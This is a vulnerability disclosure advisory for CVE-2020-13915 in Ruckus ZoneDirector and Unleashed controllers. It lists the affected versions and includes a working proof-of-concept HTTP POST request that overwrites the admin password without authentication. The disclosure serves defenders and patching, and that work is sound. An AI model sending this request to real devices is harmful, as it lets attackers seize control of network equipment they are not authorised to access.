<--

Unauthenticated admin credentials overwrite

Aleph Research Advisory

Identifier

CVE-2020-13915

Severity

Critical

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Technical Details

Insecure permissions in emfd/libemf in Ruckus Wireless Unleashed through 200.7.10.102.92 allow a remote attacker to overwrite admin credentials via an unauthenticated crafted HTTP request.

Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.

Proof Of Concept

POST /admin/_wla_conf.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 248
Connection: close

<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='/system'>
	<admin username="admin" x-password="NewPass!" auth-token="" reset=true IS_PARTIAL="" auth-by="local" authsvr-id='0' fallback-local="true" />
</ajax-request>

Timeline

Posts

Credit

External References

  1. Ruckus Networks - Security Advisory ID 20200615 - txt
  2. Ruckus Networks - Security Advisory ID 20200615 - PDF